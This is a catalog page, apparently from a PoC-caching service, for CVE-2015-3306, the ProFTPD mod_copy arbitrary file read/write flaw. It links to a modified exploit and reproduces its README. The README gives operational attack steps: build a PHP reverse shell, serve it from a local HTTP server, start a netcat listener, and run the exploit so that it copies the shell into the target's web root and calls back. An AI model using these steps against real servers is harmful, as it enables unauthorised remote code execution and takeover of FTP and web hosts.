CVE-2015-3306 PoC — ProFTPD mod_copy模块信息泄露漏洞

Source

https://github.com/cdedmondson/Modified-CVE-2015-3306-Exploit

Associated Vulnerability

Title:ProFTPD mod_copy模块信息泄露漏洞 (CVE-2015-3306)
Description:ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。 ProFTPD 1.3.5版本的mod_copy模块中存在安全漏洞。远程攻击者可借助site cpfr和site cpto命令利用该漏洞读取和写入任意文件。

Readme

# Modified-CVE-2015-3306-Exploit

# How to

1. Create a php reverse shell 
2. Start server to host shell in the same directory (python3 -m http.server)
3. Start netcat listener on local port of choice example: (nc -nlvp [port of choice])
4. Run exploit example provided below (python3 modified_CVE_2015_3306.py --host [remote host] --port [most likely port 21] --path [/var/www or /var/www/html] --shell [name of php shell] --lhost [port of netcat listener] --server_port [port of server hosting shell]

![](cve-2015-3306.png)

Original exploit source code: https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py

File Snapshot


 [4.0K]  /data/pocs/376ca900b7547dce940f0417db7fe14ebf211bcb
├── [123K]  cve-2015-3306.png
├── [3.3K]  modified_cve_2015_3306.py
└── [ 628]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!